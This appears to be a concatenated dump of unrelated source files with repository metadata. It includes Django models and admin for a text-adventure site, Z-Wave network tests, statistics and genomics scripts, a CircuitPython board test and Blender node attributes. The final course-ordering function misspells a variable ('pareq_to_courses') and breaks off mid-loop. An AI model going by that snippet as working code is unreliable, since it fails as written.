help_text="Base attack odds, before agility and armor adjustments. Weapon type does not matter.")
weapon_dice = models.IntegerField(
default=1,
help_text="Applies to natural weapons only. For an artifact weapon, the weapon's dice and sides will be used.")
weapon_sides = models.IntegerField(default=4,
help_text="Applies to natural weapons only.")
defense_bonus = models.IntegerField(
default=0,
help_text="Gives the monster an additional percent bonus to avoid being hit. (Rare)"
)
armor_class = models.IntegerField(default=0)
special = models.CharField(max_length=255, null=True, blank=True)
data = models.TextField(
max_length=1000, null=True, blank=True,
help_text="Adventure-specific data for this monster, e.g., type of monster like "
"vampire, undead, soldier, frost, etc. Data can be used in custom code. "
"Enter as a JSON object."
)
combat_verbs = models.CharField(
max_length=255, null=True, blank=True,
help_text="Custom combat verbs for this monster, e.g., 'stings' or 'breathes fire at'. "
"Leave blank to use the standard verbs.")
def __str__(self):
return self.name
class Hint(models.Model):
"""
Represents a hint for the adventure hints system
"""
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='hints', null=True)
index = models.IntegerField(null=True)
edx = models.CharField(max_length=50, null=True, blank=True)
question = models.CharField(max_length=255)
def __str__(self):
return self.question
class HintAnswer(models.Model):
"""
Represents an answer to a hint. Each hint may have more than one answer.
"""
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='hint_answers', null=True)
hint = models.ForeignKey(Hint, on_delete=models.CASCADE, related_name='answers')
index = models.IntegerField(null=True)
answer = models.TextField(max_length=1000, help_text="Supports Markdown.")
spoiler = models.BooleanField(default=False,
help_text="Obscure the answer until the user shows it.")
def save(self, **kwargs):
if self.hint and self.adventure_id != self.hint.adventure_id:
self.adventure_id = self.hint.adventure_id
super().save(**kwargs)
class PlayerProfile(models.Model):
social_id = models.CharField(max_length=100, null=True)
uuid = models.CharField(max_length=255, null=True)
class Player(models.Model):
"""
Represents the player saved in the main hall.
"""
name = models.CharField(max_length=255)
gender = models.CharField(max_length=6, choices=(
('m', 'Male'),
('f', 'Female')
))
hardiness = models.IntegerField(default=12)
agility = models.IntegerField(default=12)
charisma = models.IntegerField(default=12)
gold = models.IntegerField(default=200)
gold_in_bank = models.IntegerField(default=0)
wpn_axe = models.IntegerField("Axe ability", default=5)
wpn_bow = models.IntegerField("Bow/missile ability", default=-10)
wpn_club = models.IntegerField("Club ability", default=20)
wpn_spear = models.IntegerField("Spear/Polearm ability", default=10)
wpn_sword = models.IntegerField("Sword ability", default=0)
armor_expertise = models.IntegerField(default=0)
spl_blast = models.IntegerField("Blast ability", default=0)
spl_heal = models.IntegerField("Heal ability", default=0)
spl_power = models.IntegerField("Power ability", default=0)
spl_speed = models.IntegerField("Speed ability", default=0)
uuid = models.CharField(max_length=255, null=True)
def __str__(self):
return self.name
def log(self, type, adventure_id=None):
l = ActivityLog(player=self, type=type, adventure_id=adventure_id)
l.save()
class PlayerArtifact(models.Model):
"""
The items (weapons, armor, shield) in the player's inventory in the main hall
"""
TYPES = (
(2, 'Weapon'),
(3, 'Magic Weapon'),
(11, 'Wearable'), # armor/shield
)
ARMOR_TYPES = (
(0, 'Armor'),
(1, 'Shield'), # different in EDX - see manual
(2, 'Helmet'),
(3, 'Gloves'),
(4, 'Ring'),
)
HANDS = (
(1, 'One-handed'),
(2, 'Two-handed')
)
player = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='inventory')
name = models.CharField(max_length=255)
description = models.TextField(max_length=1000)
type = models.IntegerField(choices=TYPES)
weight = models.IntegerField(default=0)
value = models.IntegerField(default=0)
weapon_type = models.IntegerField(default=0, choices=WEAPON_TYPES, null=True)
hands = models.IntegerField(choices=HANDS, default=1)
weapon_odds = models.IntegerField(default=0, null=True)
dice = models.IntegerField(default=1, null=True)
sides = models.IntegerField(default=1, null=True)
armor_type = models.IntegerField(default=0, choices=ARMOR_TYPES, null=True)
armor_class = models.IntegerField(default=0, null=True)
armor_penalty = models.IntegerField(default=0, null=True)
def __str__(self):
return "{} {}".format(self.player, self.name)
class ActivityLog(models.Model):
"""
Used to track player activity (going on adventures, etc.)
"""
player = models.ForeignKey(Player, null=True, blank=True, on_delete=models.CASCADE, related_name='activity_log')
type = models.CharField(max_length=255)
value = models.IntegerField(null=True, blank=True)
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='activity_log', null=True)
created = models.DateTimeField(auto_now_add=True, null=True)
| [
"keith.dechant@gmail.com"
] | keith.dechant@gmail.com |
0296c3ac5062c3f2f6eea64673506c87b8776d09 | a1481440fea0f9ff44cab2c5248b6a71bcbe286c | /frontend/admin.py | a1a59501a53ad6ebdf5b6fb99596e53bda005a13 | [] | no_license | arm923i/utlandia2 | 13457cc54647122ea386efbdf865e141827b2063 | 391062e822c478ce9406922eb1a1a7518e224cd6 | refs/heads/master | 2023-08-18T16:58:30.480815 | 2021-10-18T12:58:47 | 2021-10-18T12:58:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,672 | py | from django.contrib import admin
from modeltranslation.admin import TranslationAdmin, TabbedTranslationAdmin, TranslationTabularInline
from seo.admin import ModelInstanceSeoInline
from .models import Lead, FlatsList, Floor, Dev_category, Dev_history, Documents, Gallery_docs, \
Section, WidgetBlock, ImageBlock, HeaderBlock
# class CategoryAdmin(admin.ModelAdmin):
# list_display = ('title',)
# prepopulated_fields = {'slug': ('title',)}
@admin.register(FlatsList)
class FlatsAdmin(admin.ModelAdmin):
list_display = ('number', 'property_type', 'price_m2', 'price', 'floor',
'type', 'square_total', 'rooms', 'img_url', 'status', 'section')
prepopulated_fields = {'slug': ('type',)}
list_filter = ('status', 'rooms', 'floor', 'property_type', 'section')
search_fields = ('status', 'number')
ordering = ('property_type', 'floor', 'type')
@admin.register(Dev_history)
class Dev_historyAdmin(admin.ModelAdmin):
list_display = ('category', 'title', 'created_at', 'video_url')
list_filter = ('category', 'created_at')
search_fields = ('category', 'created_at')
ordering = ('-created_at',)
@admin.register(Dev_category)
class Dev_categoryAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('title',)}
list_display = ('title', 'percent')
@admin.register(Lead)
class LeadAdmin(admin.ModelAdmin):
list_display = ('lead_name', 'phone_number')
@admin.register(Floor)
class FloorAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('number',)}
list_display = ('number',)
# class SnippetAdmin(admin.ModelAdmin):
# list_display = ('title', 'slug', 'body')
class GalleryDocumentsInline(admin.TabularInline):
fk_name = 'document'
model = Gallery_docs
extra = 1
# class GalleryBlocksInline(admin.StackedInline):
# fk_name = 'block'
# model = Gallery_blocks
# extra = 1
#
#
# class Big_textInline(TranslationTabularInline):
# fk_name = 'block'
# model = Big_text
# extra = 1
#
#
# class Small_textInline(TranslationTabularInline):
# fk_name = 'block'
# model = Small_text
# extra = 1
@admin.register(Documents)
class DocumentsAdmin(TranslationAdmin):
inlines = [GalleryDocumentsInline, ]
prepopulated_fields = {'slug': ('title',)}
class Media:
js = (
'https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js',
'https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js',
'modeltranslation/js/tabbed_translation_fields.js',
)
css = {
'screen': ('modeltranslation/css/tabbed_translation_fields.css',),
}
class ImageBlockInline(admin.StackedInline):
fk_name = 'block'
model = ImageBlock
extra = 0
class HeaderBlockInline(TranslationTabularInline):
fk_name = 'block'
model = HeaderBlock
extra = 0
class WidgetBlockInline(TranslationTabularInline):
fk_name = 'block'
model = WidgetBlock
extra = 0
@admin.register(Section)
class SectionAdmin(admin.ModelAdmin):
group_fieldsets = True
inlines = [ImageBlockInline, HeaderBlockInline, WidgetBlockInline, ]
class Media:
js = (
'https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js',
'https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js',
'modeltranslation/js/tabbed_translation_fields.js',
)
css = {
'screen': ('modeltranslation/css/tabbed_translation_fields.css',),
}
| [
"dev.arm923i@gmail.com"
] | dev.arm923i@gmail.com |
d4859c95121f3dbbb2a8a2154051082451b1d5fa | a71ba086a02ae863a4f8e6cfdc2c6fb5f4910446 | /network/core/tests/test_client_command_handler.py | e2d769f7f01a0ee989707865673ca55f2d41abdc | [] | no_license | roman-vorobiov/virtual-zwave | 03f187d79f678ad48170d2bc6fe1c333621c125d | b8b74ab6f7740777b5e5f0979ca2d2c3ca8455ba | refs/heads/master | 2023-04-10T22:59:12.785974 | 2021-04-30T15:04:09 | 2021-04-30T15:09:26 | 363,171,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,673 | py | from .fixtures import *
from network.core.command_handler import CommandHandler
import humps
import json
import pytest
@pytest.fixture
def command_handler(client, node_manager):
yield CommandHandler(client, node_manager)
@pytest.fixture
def rx_client(command_handler):
def inner(message_type: str, message: dict):
command_handler.handle_command(json.dumps({
'messageType': message_type,
'message': message
}))
yield inner
def test_get_nodes(rx_client, tx_client, included_node):
rx_client('GET_NODES', {})
tx_client('NODES_LIST', {
'nodes': [included_node.to_json()]
})
def test_create_node(rx_client, tx_client, tx_controller, nodes, node_info):
assert len(nodes.all()) == 0
rx_client('CREATE_NODE', {
'node': node_info
})
tx_client('NODE_ADDED', {
'node': nodes.all()[0].to_json()
})
assert len(nodes.all()) == 1
def test_remove_node(rx_client, tx_client, tx_controller, nodes, node):
assert len(nodes.all()) == 1
rx_client('REMOVE_NODE', {
'nodeId': node.id
})
tx_client('NODE_REMOVED', {
'nodeId': node.id
})
assert len(nodes.all()) == 0
def test_reset(rx_client, tx_client, tx_controller, nodes, node):
assert len(nodes.all()) == 1
rx_client('RESET_NETWORK', {})
tx_client('NODES_LIST', {
'nodes': []
})
assert len(nodes.all()) == 0
def test_send_nif(rx_client, tx_client, tx_controller, node):
rx_client('SEND_NIF', {
'nodeId': node.id
})
tx_controller('APPLICATION_NODE_INFORMATION', {
'source': {'homeId': node.home_id, 'nodeId': node.node_id},
'nodeInfo': node.get_node_info().to_json()
})
def test_update_node(rx_client, tx_client, tx_controller, node):
command_class = node.root_channel.get_command_class(0x25)
assert command_class.value is False
rx_client('UPDATE_COMMAND_CLASS', {
'nodeId': node.id,
'channelId': node.root_channel.endpoint,
'classId': 0x25,
'state': {
'value': True
}
})
tx_client('COMMAND_CLASS_UPDATED', {
'nodeId': node.id,
'channelId': 0,
'commandClass': humps.camelize(node.get_channel(0).command_classes[0x25].to_dict())
})
assert command_class.value is True
def test_reset_node(rx_client, tx_client, tx_controller, node):
command_class = node.root_channel.get_command_class(0x25)
command_class.value = True
rx_client('RESET_NODE', {
'nodeId': node.id
})
tx_client('NODE_RESET', {
'node': node.to_json()
})
assert command_class.value is False
| [
"roman.vorobyov7777@gmail.com"
] | roman.vorobyov7777@gmail.com |
531f170b486d939d4b48fe551c44c13a071de08e | ad19e4f69657bce1c2ad744bc013562a7aeb77e1 | /z-score.py | 2ac3dd0188b010b682ad890c813d91698e94c9c9 | [] | no_license | MEENAGARAI/c111 | 9d7bd9893379cad4b53758bba33854451519e84e | d9ff8025ca1cffeced8114a47344ae593baa3592 | refs/heads/main | 2023-03-03T22:36:43.292830 | 2021-02-17T14:02:30 | 2021-02-17T14:02:30 | 331,334,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,735 | py | import plotly.figure_factory as ff
import plotly.graph_objects as go
import statistics
import random
import pandas as pd
import csv
#Change the School data here
df = pd.read_csv("School2.csv")
data = df["Math_score"].tolist()
## code to find the mean of 100 data points 1000 times
#function to get the mean of the given data samples
# pass the number of data points you want as counter
def random_set_of_mean(counter):
dataset = []
for i in range(0, counter):
random_index= random.randint(0,len(data)-1)
value = data[random_index]
dataset.append(value)
mean = statistics.mean(dataset)
return mean
# Function to get the mean of 100 data sets
mean_list = []
for i in range(0,1000):
set_of_means= random_set_of_mean(100)
mean_list.append(set_of_means)
## calculating mean and standard_deviation of the sampling distribution.
std_deviation = statistics.stdev(mean_list)
mean = statistics.mean(mean_list)
print("mean of sampling distribution:- ",mean)
print("Standard deviation of sampling distribution:- ", std_deviation)
## findig the standard deviation starting and ending values
first_std_deviation_start, first_std_deviation_end = mean-std_deviation, mean+std_deviation
second_std_deviation_start, second_std_deviation_end = mean-(2*std_deviation), mean+(2*std_deviation)
third_std_deviation_start, third_std_deviation_end = mean-(3*std_deviation), mean+(3*std_deviation)
# print("std1",first_std_deviation_start, first_std_deviation_end)
# print("std2",second_std_deviation_start, second_std_deviation_end)
# print("std3",third_std_deviation_start,third_std_deviation_end)
# # finding the mean of THE STUDENTS WHO GAVE EXTRA TIME TO MATH LAB and plotting on graph
df = pd.read_csv("School_1_Sample.csv")
data = df["Math_score"].tolist()
mean_of_sample1 = statistics.mean(data)
print("Mean of sample 1:- ",mean_of_sample1)
fig = ff.create_distplot([mean_list], ["student marks"], show_hist=False)
fig.add_trace(go.Scatter(x=[mean, mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[mean_of_sample1, mean_of_sample1], y=[0, 0.17], mode="lines", name="MEAN OF STUDENTS WHO HAD MATH LABS"))
fig.add_trace(go.Scatter(x=[first_std_deviation_end, first_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1 END"))
fig.add_trace(go.Scatter(x=[second_std_deviation_end, second_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2 END"))
fig.add_trace(go.Scatter(x=[third_std_deviation_end, third_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3 END"))
fig.show()
# #finding the mean of the STUDENTS WHO USED MATH PRACTISE APP and plotting it on the plot.
df = pd.read_csv("School_2_Sample.csv")
data = df["Math_score"].tolist()
mean_of_sample2 = statistics.mean(data)
print("mean of sample 2:- ",mean_of_sample2)
fig = ff.create_distplot([mean_list], ["student marks"], show_hist=False)
fig.add_trace(go.Scatter(x=[mean, mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[mean_of_sample2, mean_of_sample2], y=[0, 0.17], mode="lines", name="MEAN OF STUDENTS WHO USED THE APP"))
fig.add_trace(go.Scatter(x=[first_std_deviation_end, first_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1 END"))
fig.add_trace(go.Scatter(x=[second_std_deviation_end, second_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2 END"))
fig.add_trace(go.Scatter(x=[third_std_deviation_end, third_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3 END"))
fig.show()
# finding the mean of the STUDENTS WHO WERE ENFORCED WITH REGISTERS and plotting it on the plot.
df = pd.read_csv("School_3_Sample.csv")
data = df["Math_score"].tolist()
mean_of_sample3 = statistics.mean(data)
print("mean of sample 3:- ",mean_of_sample3)
fig = ff.create_distplot([mean_list], ["student marks"], show_hist=False)
fig.add_trace(go.Scatter(x=[mean, mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[mean_of_sample3, mean_of_sample3], y=[0, 0.17], mode="lines", name="MEAN OF STUDNETS WHO WERE ENFORCED WITH MATH REGISTERS"))
fig.add_trace(go.Scatter(x=[second_std_deviation_end, second_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2 END"))
fig.add_trace(go.Scatter(x=[third_std_deviation_end, third_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3 END"))
fig.show()
#finding the z score using the formula
z_score = (mean_of_sample1-mean)/std_deviation
print("The z score is = ",z_score)
z_score = (mean_of_sample2-mean)/std_deviation
print("The z score is = ",z_score)
z_score = (mean_of_sample3-mean)/std_deviation
print("The z score is = ",z_score) | [
"noreply@github.com"
] | noreply@github.com |
d6447c5e8113bc3dfba69e31df59d4e3c714b954 | 5257652fc34ec87fe45d390ba49b15b238860104 | /single_cell_atacseq_preprocessing/pseudorep_peaks_supported_by_30percent_of_bioreps_in_same_region/get_number_of_samples_that_support_each_regional_peak.py | 47f15d19a533484f6a223eea9579cbdf122b1557 | [] | no_license | thekingofall/alzheimers_parkinsons | cd247fa2520c989e8dd853ed22b58a9bff564391 | 4ceae6ea3eb4c58919ff41aed8803855bca240c8 | refs/heads/master | 2022-11-30T22:36:37.201334 | 2020-08-12T01:23:55 | 2020-08-12T01:23:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,190 | py | #using IDR optimal peaks from the pseudoreplicate set, calculate the number of biological replicates (based on biorep IDR optimal peak sets) that support each peak
import argparse
import pybedtools
import gzip
def parse_args():
parser=argparse.ArgumentParser(description="using IDR optimal peaks from the pseudoreplicate set, calculate the number of biological replicates (based on biorep IDR optimal peak sets) that support each peak")
parser.add_argument("--pseudorep_idr_optimal_peaks",help="file containing full paths to the pseudorep IDR peak sets")
parser.add_argument("--biorep_idr_optimal_peaks",help="file containing full paths to the biorep IDR peak sets")
parser.add_argument("--samples",help="file containing list of samples to annotate")
parser.add_argument("--thresh",default=0.3,type=float,help="percent of bioreps for a given condition/region that must contain a peak for it to be included in the finalized set")
parser.add_argument("--out_suffix",default=".idr.optimal_peaks.support30%.bed.gz",help="file suffix for the sample output peak file prefix")
return parser.parse_args()
def get_sample_to_pseudorep_peak_map(samples,pseudorep_idr_optimal_peaks):
sample_to_pseudorep_peaks=dict()
for pseudorep_peakset in pseudorep_idr_optimal_peaks:
for sample in samples:
if sample in pseudorep_peakset:
sample_to_pseudorep_peaks[sample]=pybedtools.bedtool.BedTool(pseudorep_peakset)
break
return sample_to_pseudorep_peaks
def get_sample_to_biorep_peak_map(samples,biorep_idr_optimal_peaks):
sample_to_biorep_peaks=dict()
for sample in samples:
sample_to_biorep_peaks[sample]=[]
for biorep_peakset in biorep_idr_optimal_peaks:
renamed=biorep_peakset.replace('/','_')
for sample in samples:
if sample in renamed:
sample_to_biorep_peaks[sample].append(pybedtools.bedtool.BedTool(biorep_peakset) )
break
return sample_to_biorep_peaks
def main():
args=parse_args()
pseudorep_idr_optimal_peaks=open(args.pseudorep_idr_optimal_peaks,'r').read().strip().split('\n')
biorep_idr_optimal_peaks=open(args.biorep_idr_optimal_peaks,'r').read().strip().split('\n')
samples=open(args.samples,'r').read().strip().split('\n')
sample_to_pseudorep_peaks=get_sample_to_pseudorep_peak_map(samples,pseudorep_idr_optimal_peaks)
sample_to_biorep_peaks=get_sample_to_biorep_peak_map(samples,biorep_idr_optimal_peaks)
for sample in samples:
print(sample)
pseudorep_peaks=sample_to_pseudorep_peaks[sample]
support_histogram=dict()
for entry in pseudorep_peaks:
support_histogram[tuple(entry[0:3])]=[0,entry]
for biorep_peaks in sample_to_biorep_peaks[sample]:
#intersect them
try:
intersection=pseudorep_peaks.intersect(biorep_peaks,u=True,f=0.4,F=0.4,e=True)
except:
print("could not intersect,skipping")
continue
intersection=list(set([tuple(i[0:3]) for i in intersection]))
print(str(len(intersection))+"/"+str(len(pseudorep_peaks)))
for intersection_entry in intersection:
support_histogram[intersection_entry][0]+=1
outf=gzip.open(sample+args.out_suffix,'wt')
outf_bad=gzip.open(sample+".unsupported"+args.out_suffix,'wt')
min_support_count=args.thresh*len(sample_to_biorep_peaks[sample])
print("min_support_count:"+str(min_support_count))
out_good=[]
out_bad=[]
for entry in support_histogram:
cur_entry_support=support_histogram[entry][0]
if cur_entry_support >= min_support_count:
out_good.append(str(support_histogram[entry][1]).rstrip('\n')+'\t'+str(cur_entry_support))
else:
out_bad.append(str(support_histogram[entry][1]).rstrip('\n')+'\t'+str(cur_entry_support))
outf.write('\n'.join(out_good))
outf_bad.write('\n'.join(out_bad)+'\n')
outf.close()
outf_bad.close()
if __name__=="__main__":
main()
| [
"annashcherbina@gmail.com"
] | annashcherbina@gmail.com |
3822dc71dbe9d74b56a67f934b2b21851a2d04bd | 19da1a56f137a08772c347cf974be54e9c23c053 | /lib/adafruit_boardtest/boardtest_voltage_monitor.py | bcdd23695e093d6d8bed54eddee6c02a1518167c | [] | no_license | mk53202/mk53202-timeclock-pyportal | d94f45a9d186190a4bc6130077baa6743a816ef3 | 230a858d429f8197c00cab3e67dcfd3b295ffbe0 | refs/heads/master | 2021-02-04T05:38:25.533292 | 2020-02-27T22:45:56 | 2020-02-27T22:45:56 | 243,626,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,216 | py | # The MIT License (MIT)
#
# Copyright (c) 2018 Shawn Hymel for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_boardtest.boardtest_voltage_monitor`
====================================================
Prints out the measured voltage on any onboard voltage/battery monitor pins.
Note that some boards have an onboard voltage divider to decrease the voltage
to these pins.
Run this script as its own main.py to individually run the test, or compile
with mpy-cross and call from separate test script.
* Author(s): Shawn Hymel for Adafruit Industries
Implementation Notes
--------------------
**Hardware:**
* `Multimeter <https://www.adafruit.com/product/2034>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import board
import analogio
__version__ = "1.0.1"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_BoardTest.git"
# Constants
VOLTAGE_MONITOR_PIN_NAMES = ['VOLTAGE_MONITOR', 'BATTERY']
ANALOG_REF = 3.3 # Reference analog voltage
ANALOGIN_BITS = 16 # ADC resolution (bits) for CircuitPython
# Test result strings
PASS = "PASS"
FAIL = "FAIL"
NA = "N/A"
def run_test(pins):
"""
Prints out voltage on the battery monitor or voltage monitor pin.
:param list[str] pins: list of pins to run the test on
:return: tuple(str, list[str]): test result followed by list of pins tested
"""
# Look for pins with battery monitoring names
monitor_pins = list(set(pins).intersection(set(VOLTAGE_MONITOR_PIN_NAMES)))
# Print out voltage found on these pins
if monitor_pins:
# Print out the monitor pins found
print("Voltage monitor pins found:", end=' ')
for pin in monitor_pins:
print(pin, end=' ')
print('\n')
# Print out the voltage found on each pin
for pin in monitor_pins:
monitor = analogio.AnalogIn(getattr(board, pin))
voltage = (monitor.value * ANALOG_REF) / (2**ANALOGIN_BITS)
print(pin + ": {:.2f}".format(voltage) + " V")
monitor.deinit()
print()
# Ask the user to check these voltages
print("Use a multimeter to verify these voltages.")
print("Note that some battery monitor pins might have onboard " +
"voltage dividers.")
print("Do the values look reasonable? [y/n]")
if input() == 'y':
return PASS, monitor_pins
return FAIL, monitor_pins
# Else (no pins found)
print("No battery monitor pins found")
return NA, []
def _main():
# List out all the pins available to us
pins = [p for p in dir(board)]
print()
print("All pins found:", end=' ')
# Print pins
for pin in pins:
print(pin, end=' ')
print('\n')
# Run test
result = run_test(pins)
print()
print(result[0])
print("Pins tested: " + str(result[1]))
# Execute only if run as main.py or code.py
if __name__ == "__main__":
_main()
| [
"mkoster@stack41.com"
] | mkoster@stack41.com |
faa0ab004c18bd45116e831d5433c6c545aaedb2 | 2f418a0f2fcca40f84ec0863b31ff974b574350c | /scripts/addons_extern/nodes_io/attributes.py | 5763cb541cfaa72d6cdbe4733176fefca15e8fb1 | [] | no_license | JT-a/blenderpython279 | 57a81b55564218f3b1417c2ffa97f5161897ec79 | 04846c82f794c22f87d677d9eb8cec1d05c48cda | refs/heads/master | 2021-06-25T06:58:07.670613 | 2017-09-11T11:14:36 | 2017-09-11T11:14:36 | 103,723,697 | 4 | 2 | null | 2017-09-16T04:09:31 | 2017-09-16T04:09:31 | null | UTF-8 | Python | false | false | 3,621 | py | #!/usr/bin/python3
# --------------------------------------------------
# ATTRIBUTES
# --------------------------------------------------
defaults = [
"bl_idname",
# "type", # read-only
"name",
"label",
# "parent",
"select",
"location",
# "dimensions", # read-only
"width",
"height",
# "width_hidden",
"use_custom_color",
"color",
"hide",
"mute",
"show_options",
"show_preview",
"show_texture",
# "inputs",
# "outputs",
]
specials = [
"attribute_name", # ["ATTRIBUTE"]
"axis", # ["TANGENT"]
"blend_type", # ["MIX_RGB"]
"bytecode", # ["SCRIPT"]
"bytecode_hash", # ["SCRIPT"]
"color_mapping", # ["TEX_IMAGE", "TEX_ENVIRONMENT", "TEX_NOISE", "TEX_GRADIENT", "TEX_MUSGRAVE", "TEX_MAGIC", "TEX_WAVE", "TEX_SKY", "TEX_VORONOI", "TEX_CHECKER", "TEX_BRICK"]
"color_ramp", # ["VALTORGB"]
"color_space", # ["TEX_IMAGE", "TEX_ENVIRONMENT"]
"coloring", # ["TEX_VORONOI"]
"component", # ["BSDF_HAIR", "BSDF_TOON"]
"convert_from", # ["VECT_TRANSFORM"]
"convert_to", # ["VECT_TRANSFORM"]
"direction_type", # ["TANGENT"]
"distribution", # ["BSDF_GLOSSY", "BSDF_REFRACTION", "BSDF_ANISOTROPIC", "BSDF_GLASS"]
"falloff", # ["SUBSURFACE_SCATTERING"]
"filepath", # ["SCRIPT"]
"from_dupli", # ["UVMAP", "TEX_COORD"]
"gradient_type", # ["TEX_GRADIENT"]
"ground_albedo", # ["TEX_SKY"]
"image", # ["TEX_IMAGE", "TEX_ENVIRONMENT"]
"interpolation", # ["TEX_IMAGE"]
"invert", # ["BUMP"]
"is_active_output", # ["OUTPUT_MATERIAL", "OUTPUT_LAMP"]
"label_size", # ["FRAME"]
"mapping", # ["CURVE_RGB", "CURVE_VEC"]
"max", # ["MAPPING"]
"min", # ["MAPPING"]
"mode", # ["SCRIPT"]
"musgrave_type", # ["TEX_MUSGRAVE"]
"node_tree", # ["GROUP"]
"object", # ["TEX_COORD"]
"offset", # ["TEX_BRICK"]
"offset_frequency", # ["TEX_BRICK"]
"operation", # ["VECT_MATH", "MATH"]
"projection", # ["TEX_IMAGE", "TEX_ENVIRONMENT"]
"projection_blend", # ["TEX_IMAGE"]
"rotation", # ["MAPPING"]
"scale", # ["MAPPING"]
"script", # ["SCRIPT"]
"shrink", # ["FRAME"]
"sky_type", # ["TEX_SKY"]
"space", # ["NORMAL_MAP"]
"squash", # ["TEX_BRICK"]
"squash_frequency", # ["TEX_BRICK"]
"sun_direction", # ["TEX_SKY"]
"text", # ["FRAME"]
"texture_mapping", # ["TEX_IMAGE", "TEX_ENVIRONMENT", "TEX_NOISE", "TEX_GRADIENT", "TEX_MUSGRAVE", "TEX_MAGIC", "TEX_WAVE", "TEX_SKY", "TEX_VORONOI", "TEX_CHECKER", "TEX_BRICK"]
"translation", # ["MAPPING"]
"turbidity", # ["TEX_SKY"]
"turbulence_depth", # ["TEX_MAGIC"]
"use_alpha", # ["MIX_RGB"]
"use_auto_update", # ["SCRIPT"]
"use_clamp", # ["MIX_RGB", "MATH"]
"use_max", # ["MAPPING"]
"use_min", # ["MAPPING"]
"use_pixel_size", # ["WIREFRAME"]
"uv_map", # ["TANGENT", "UVMAP", "NORMAL_MAP"]
"vector_type", # ["MAPPING", "VECT_TRANSFORM"]
"wave_type", # ["TEX_WAVE"]
]
# --------------------------------------------------
# INPUTS / OUTPUTS TYPES
# --------------------------------------------------
sock_vectors = [
"RGBA",
"VECTOR",
]
sock_values = [
"CUSTOM",
"VALUE",
"INT",
"BOOLEAN",
"STRING",
]
| [
"meta.androcto1@gmail.com"
] | meta.androcto1@gmail.com |
ff55677112a77bdac2fab9a90dd23d2e0ca0ca76 | db33ef7f994d1dc093a7b216b6ba461b7073b42c | /p101.py | 659d635c42eba044ce012a68e5c7fbc380f5ac2c | [] | no_license | whyaza/leetcodepy | cccf911b6179368fb41c509bfe8b5e4ab149ed14 | b1e63fd1d3b83a547ac8dc75058a82668f3ccd7f | refs/heads/master | 2020-03-28T09:16:36.905649 | 2018-09-12T12:54:42 | 2018-09-12T12:54:42 | 148,025,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
| [
"645112728@qq.com"
] | 645112728@qq.com |
38836bcb8446dea837411dcda1c0495c5a01f126 | d12b836156b09caa232a230e8b3c021e15853014 | /day-37-plus.py | 2a4ac06d212673a41ea2bfa72be73c415fc63196 | [] | no_license | paperfellaceo/daily-coding-nectar | 3fea28ff3722b76bbe6cf7429508989a14500c74 | d85c371d577b70f04389425082171b9160c1e7b4 | refs/heads/main | 2023-07-27T15:49:30.673042 | 2021-09-11T17:08:25 | 2021-09-11T17:08:25 | 384,548,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,378 | py | from collections import defaultdict, deque
def find_order(course_to_prereqs):
course_to_prereqs = {c: set(p) for c, p in course_to_prereqs.items()}
todo = deque([c for c, p in course_to_prereqs.items() if not p])
pareq_to_courses = defaultdict(list)
for course, prereqs in course_to_prereqs.items():
for prereq in prereqs:
prereq_to_courses[prereq].append(course)
result = []
while todo:
prereq = todo.popleft()
result.append(prereq)
for c in prereq_to_courses[prereq]:
course_to_prereqs[c].remove(prereq)
if not course_to_prereqs[c]:
